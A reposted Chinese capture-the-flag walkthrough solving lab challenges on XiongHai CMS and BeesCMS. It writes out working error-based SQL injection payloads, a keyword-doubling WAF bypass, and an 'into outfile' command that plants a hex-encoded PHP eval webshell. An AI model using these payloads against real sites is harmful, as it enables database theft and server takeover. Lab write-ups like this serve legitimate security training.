尤里的复仇II 回归

admin

102210
文章

87
评论

2022年7月11日09:29:15评论105 views字数 1331阅读4分26秒阅读模式

目录：

渗透第一步-信息收集 1

渗透第一步-信息收集 2

基础环境搭建

sqlmap尝鲜题

sql-注入绕过防护getshell

尤里的复仇II 回归

渗透第一步-信息收集 1

尤里的复仇II 回归

扫到目录之后应该进行二次扫描

http://oovw8022.ia.aqlab.cn:8022/caidian/files/

尤里的复仇II 回归

渗透第一步-信息收集 2

tips说用sql注入拿flag

尤里的复仇II 回归

可以明显看到是熊海cms

尤里的复仇II 回归

熊海cms和beescms也经常被拿来当代码审计学习，熟悉的师傅都知道有哪些漏洞

尤里的复仇II 回归

1' or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x7e),1)#

尤里的复仇II 回归

1' or updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name="flag" limit 1,1 ),0x7e),1)#

尤里的复仇II 回归

1' or updatexml(1,concat(0x7e,(select  flag from flag),0x7e),1)#

尤里的复仇II 回归

sqlmap尝鲜题

利用sqlmap去跑注入

sql-注入绕过防护getshell

beescms

后台登录有个注入，先正常判断

尤里的复仇II 回归

过滤了union select

尤里的复仇II 回归

从下面可以看出是单独过滤union和select

尤里的复仇II 回归

这不就开始了，这才来到题目绕waf的关键

经过尝试后，在union前面加/*或者采用un union ion，select采用双写绕过

user=1%27+/*union+seselectlect+1,2,3,4,5+--+

尤里的复仇II 回归

没有回显，那么我们只能通过盲注或者报错注入来实现读取flag,这里采用报错注入来得快一些

1' /*union selselectect 1,2,3,4,"" /*into ououtfiletfile 'D:/phpStudy/www/qwe.php'#

into outfile也一样采用注释和双写绕过，前面一直写不进去很奇怪，不过用数字又写入正常

尤里的复仇II 回归

后面对一句话采用16进制编码，你肯定也疑惑怎么得到路径的，其实我也没猜到，本来要让web报错显示路径，爆不出来，前面第一关信息收集这里虽然不是同一个站点，但是明显是phpstudy_pro后面跟www,只能去盲猜了，要嘛phpstudy要嘛phpstudy_pro

尤里的复仇II 回归

两种方式都写在下面了

1111111' /*union selselectect  1,2,3,4,0x3c3f70687020406576616c28245f504f53545b315d293b3f3e /*into outoutfilefile 'D:/phpstudy/www/qwe6.php'--

1111111' un union ion selselectect  1,2,3,4,0x3c3f70687020406576616c28245f504f53545b315d293b3f3e in into to outoutfilefile 'D:/phpstudy/www/qwe6.php'--

拿到flag

尤里的复仇II 回归

原文始发于微信公众号（扫地僧的茶饭日常）：尤里的复仇II 回归

左青龙
微信扫一扫

右白虎
微信扫一扫

尤里的复仇II 回归

浅谈API漏洞挖掘

滥⽤分叉完成代码注⼊对抗EDR

记一次参数走私导致的权限绕过

高级黑客技术-5. 反向Shell/Shell

第91篇：shiro反序列化漏洞绕waf防护的方法总结（上篇）

hacker10101

主权与信任：网络时代的供应链安全

深入了解DHCP

护网怎么做，护网前、护网中，护网后，总共60道工序，一道一道讲清楚

【论文速读】|大语言模型（LLM）智能体可以自主利用1-day漏洞

发表评论

在线咨询

微信